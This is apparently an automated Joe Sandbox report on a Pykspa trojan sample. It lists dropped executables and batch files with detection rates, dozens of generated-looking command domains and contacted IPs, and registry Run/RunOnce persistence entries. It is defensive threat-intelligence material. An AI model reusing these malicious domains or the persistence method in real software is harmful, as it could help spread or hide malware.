C:\ylnagyfkxg.bat100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\takyouhoymc.exe100%AviraTR/Agent.327680.A
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%AviraTR/Drop.Agent.bjxj
C:\qfjygajqfqgo.bat100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%AviraTR/Drop.Agent.bjxj
C:\qhneokveviakxo.bat100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\zjisvko.exe100%AviraTR/Agent.327680.A
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%AviraTR/Drop.Agent.bjxj
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%Joe Sandbox ML
C:\ylnagyfkxg.bat100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\takyouhoymc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%Joe Sandbox ML
C:\qfjygajqfqgo.bat100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%Joe Sandbox ML
C:\qhneokveviakxo.bat100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\zjisvko.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\ylnagyfkxg.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\srfewatkjeewrqrigftsko.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Users\user\AppData\Local\Temp\zvgcrsiwskhwokiwrny.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\bzmkbewmkeduommczxkiz.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\fzicpocoiytgwqmyr.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\mjvsikbqngeunkjyurda.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\ojtoccrezqmarmjwql.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\srfewatkjeewrqrigftsko.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\yrzsecpaticodwrc.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\SysWOW64\zvgcrsiwskhwokiwrny.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\bzmkbewmkeduommczxkiz.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\fzicpocoiytgwqmyr.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\mjvsikbqngeunkjyurda.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\ojtoccrezqmarmjwql.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\srfewatkjeewrqrigftsko.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\yrzsecpaticodwrc.exe97%ReversingLabsWin32.Trojan.Pykspa
C:\Windows\zvgcrsiwskhwokiwrny.exe97%ReversingLabsWin32.Trojan.Pykspa
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
myspace.com
34.111.176.156
truefalse
    unknown
    bbc.map.fastly.net
    151.101.128.81
    truefalse
      unknown
      buakrgp.org
      162.249.65.164
      truefalse
        unknown
        www.whatismyip.com
        104.27.206.92
        truetrue
          unknown
          qkqsgqekyago.org
          162.249.65.164
          truefalse
            unknown
            kwecii.org
            162.249.65.164
            truefalse
              unknown
              lwbjtptjlzji.net
              35.164.78.200
              truefalse
                unknown
                iewiai.org
                162.249.65.164
                truefalse
                  unknown
                  zcdwpozkfvv.org
                  162.249.65.164
                  truefalse
                    unknown
                    www.showmyipaddress.com
                    172.67.155.175
                    truetrue
                      unknown
                      star-mini.c10r.facebook.com
                      31.13.67.35
                      truefalse
                        unknown
                        jmvozxx.org
                        162.249.65.164
                        truefalse
                          unknown
                          dwtopsisx.org
                          162.249.65.164
                          truefalse
                            unknown
                            whatismyipaddress.com
                            104.19.223.79
                            truetrue
                              unknown
                              d2bytcopxu066p.cloudfront.net
                              18.64.172.225
                              truefalse
                                unknown
                                pki-goog.l.google.com
                                142.250.217.195
                                truefalse
                                  unknown
                                  wcasugikao.org
                                  162.249.65.164
                                  truefalse
                                    unknown
                                    bg.microsoft.map.fastly.net
                                    199.232.214.172
                                    truefalse
                                      unknown
                                      htcdxnm.org
                                      162.249.65.164
                                      truefalse
                                        unknown
                                        xkesrsk.org
                                        162.249.65.164
                                        truefalse
                                          unknown
                                          awoumowqyw.org
                                          162.249.65.164
                                          truefalse
                                            unknown
                                            gemckmkqmeim.org
                                            162.249.65.164
                                            truefalse
                                              unknown
                                              muosqoie.org
                                              162.249.65.164
                                              truefalse
                                                unknown
                                                xhjwwgwd.info
                                                85.214.228.140
                                                truefalse
                                                  unknown
                                                  wsmpvwxb.info
                                                  208.100.26.245
                                                  truefalse
                                                    unknown
                                                    hosplypcd.net
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      ucrkhizrjle.net
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        dcbeeq.net
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          ozsqpqy.net
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            uugiiqomoa.org
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              uagoeg.org
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                ryxedahgvtlu.net
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  otykmmxuwhs.info
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    ikvzsyc.net
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      hlrqvyg.net
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        nifigom.net
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          zszagqbuxtu.org
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            kyszrzmuawj.net
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              dieqnoxgfoxb.net
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                zfrhqybxtdeg.net
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  fygwaqxgysw.net
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    eyngxwxvv.info
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      rboarkztdep.net
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        gwcisuuo.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          wgiusyackwya.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            yjtugxbx.net
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              emxwaolfpmi.net
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                gmwsmkuo.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  saxwjjjeb.info
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    vgpckslqq.info
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      agakymgcigsw.org
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        giglhwhuby.net
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          xofihfrimj.net
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            iilirx.info
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              zmzaasi.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                bwvdpivgkbq.info
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  sxwhjlvgpu.net
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    pomobah.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      akyndev.info
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        nrayothh.net
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          ywzcjat.info
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            hdtuhunof.info
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              eukvpt.info
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                strpoehe.net
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  lkykrcllfknb.net
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    jcfzmn.info
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      khhwhgysu.info
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        jcyusd.info
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          dadqeqrbmhkp.net
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            keyuqaco.org
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              fltebaltkwm.info
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                ftpehwlaf.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  mbrwiditjn.info
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    oqecuy.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      ebzwtwgch.info
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        fnvcomt.net
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          coxovsu.info
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            vacovcj.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              qqikyaggkswy.org
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                pqqobu.net
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  otmccjnozm.net
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    wccbxqqoyoy.net
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      fakljq.net
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        pspexyjytqa.org
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          tqpofcjab.net
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            hevkrkpespf.info
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              zryswp.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                rcxvkunydmr.net
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  wuzupehil.net
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    qaciphd.net
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      magkesswuu.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        qayaswom.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          llymgadj.net
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            egvabsriwel.net
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              kgswyswsms.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                vjjuxotcr.net
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknowntrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  cvpprc.net
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    ptxmhgbxv.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      yxeqglor.net
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        qodrrrzehko.net
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://www.facebook.com/false
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://xhjwwgwd.info/false
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://whatismyipaddress.com/true
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.showmyipaddress.com/true
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://wsmpvwxb.info/false
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.imdb.com/false
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://www.whatismyip.com/true
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        http://lwbjtptjlzji.net/false
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.myspace.com/false
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                            http://schemas.xmlsoap.org/soap/encoding/zjisvko.exe.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/takyouhoymc.exe, takyouhoymc.exe, 00000013.00000000.208452330828.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000013.00000002.208453009696.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000015.00000000.208467251273.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000015.00000002.208467838534.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000016.00000000.208481029664.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000016.00000002.208519746880.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000017.00000000.208492207536.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000017.00000002.208493160917.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000018.00000000.208505933983.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000018.00000002.208506730015.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000019.00000000.208520152098.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 00000019.00000002.208521268464.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001A.00000000.208530811819.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001A.00000002.208570641746.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001C.00000002.208538250456.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001C.00000000.208537389886.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001D.00000000.208539397524.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001D.00000002.208540705118.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001E.00000000.208547520969.000000000042A000.00000002.00000001.01000000.00000006.sdmp, takyouhoymc.exe, 0000001E.00000002.208548234455.000000000042A000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                31.13.67.35
                                                                                                                                                                                                                                star-mini.c10r.facebook.comIreland
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                104.19.223.79
                                                                                                                                                                                                                                whatismyipaddress.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                35.164.78.200
                                                                                                                                                                                                                                lwbjtptjlzji.netUnited States
                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                104.27.207.92
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                41.47.39.184
                                                                                                                                                                                                                                unknownEgypt
                                                                                                                                                                                                                                8452TE-ASTE-ASEGfalse
                                                                                                                                                                                                                                114.25.71.193
                                                                                                                                                                                                                                unknownTaiwan; Republic of China (ROC)
                                                                                                                                                                                                                                3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                                                                                                                                                212.75.9.215
                                                                                                                                                                                                                                unknownBulgaria
                                                                                                                                                                                                                                43205BULSATCOM-BG-ASSofiaBGtrue
                                                                                                                                                                                                                                85.217.219.168
                                                                                                                                                                                                                                unknownTaiwan; Republic of China (ROC)
                                                                                                                                                                                                                                138611CSTLC-AS-APCloudSpeedTechnologyLimitedCoTWfalse
                                                                                                                                                                                                                                34.111.176.156
                                                                                                                                                                                                                                myspace.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                46.159.134.7
                                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                                12389ROSTELECOM-ASRUfalse
                                                                                                                                                                                                                                89.215.35.152
                                                                                                                                                                                                                                unknownBulgaria
                                                                                                                                                                                                                                13124IBGCBGfalse
                                                                                                                                                                                                                                78.63.102.38
                                                                                                                                                                                                                                unknownLithuania
                                                                                                                                                                                                                                8764TELIA-LIETUVALTtrue
                                                                                                                                                                                                                                208.100.26.245
                                                                                                                                                                                                                                wsmpvwxb.infoUnited States
                                                                                                                                                                                                                                32748STEADFASTUSfalse
                                                                                                                                                                                                                                172.67.155.175
                                                                                                                                                                                                                                www.showmyipaddress.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                104.27.206.92
                                                                                                                                                                                                                                www.whatismyip.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                18.64.172.225
                                                                                                                                                                                                                                d2bytcopxu066p.cloudfront.netUnited States
                                                                                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                178.90.73.188
                                                                                                                                                                                                                                unknownKazakhstan
                                                                                                                                                                                                                                9198KAZTELECOM-ASKZfalse
                                                                                                                                                                                                                                188.114.42.197
                                                                                                                                                                                                                                unknownRussian Federation
                                                                                                                                                                                                                                12389ROSTELECOM-ASRUfalse
                                                                                                                                                                                                                                89.215.115.4
                                                                                                                                                                                                                                unknownBulgaria
                                                                                                                                                                                                                                13124IBGCBGfalse
                                                                                                                                                                                                                                85.214.228.140
                                                                                                                                                                                                                                xhjwwgwd.infoGermany
                                                                                                                                                                                                                                6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                162.249.65.164
                                                                                                                                                                                                                                buakrgp.orgUnited States
                                                                                                                                                                                                                                7922COMCAST-7922USfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.11.8
                                                                                                                                                                                                                                192.168.11.7
                                                                                                                                                                                                                                192.168.11.9
                                                                                                                                                                                                                                192.168.11.2
                                                                                                                                                                                                                                192.168.11.1
                                                                                                                                                                                                                                192.168.11.4
                                                                                                                                                                                                                                192.168.11.3
                                                                                                                                                                                                                                192.168.11.6
                                                                                                                                                                                                                                192.168.11.5
                                                                                                                                                                                                                                192.168.11.13
                                                                                                                                                                                                                                192.168.11.12
                                                                                                                                                                                                                                192.168.11.15
                                                                                                                                                                                                                                192.168.11.14
                                                                                                                                                                                                                                192.168.11.11
                                                                                                                                                                                                                                192.168.11.10
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1534090
                                                                                                                                                                                                                                Start date and time:2024-10-15 15:36:39 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 13m 8s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                                Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Sample name:HqvlYZC7Gf.exe
                                                                                                                                                                                                                                (renamed file extension from none to exe)
                                                                                                                                                                                                                                Original Sample Name:HqvlYZC7Gf
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.spre.troj.expl.evad.winEXE@91/39@511/36
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 126
                                                                                                                                                                                                                                • Number of non-executed functions: 225
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • VT rate limit hit for: HqvlYZC7Gf.exe
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                09:39:00API Interceptor5114226x Sleep call for process: zjisvko.exe modified
                                                                                                                                                                                                                                09:39:21API Interceptor5887x Sleep call for process: HqvlYZC7Gf.exe modified
                                                                                                                                                                                                                                15:38:51AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypyk ojtoccrezqmarmjwql.exe .
                                                                                                                                                                                                                                15:38:59AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyr C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe .
                                                                                                                                                                                                                                15:39:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrc mjvsikbqngeunkjyurda.exe .
                                                                                                                                                                                                                                15:39:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypyk C:\Users\user\AppData\Local\Temp\mjvsikbqngeunkjyurda.exe .
                                                                                                                                                                                                                                15:39:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tlskvseogunymey yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                15:39:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgo C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe
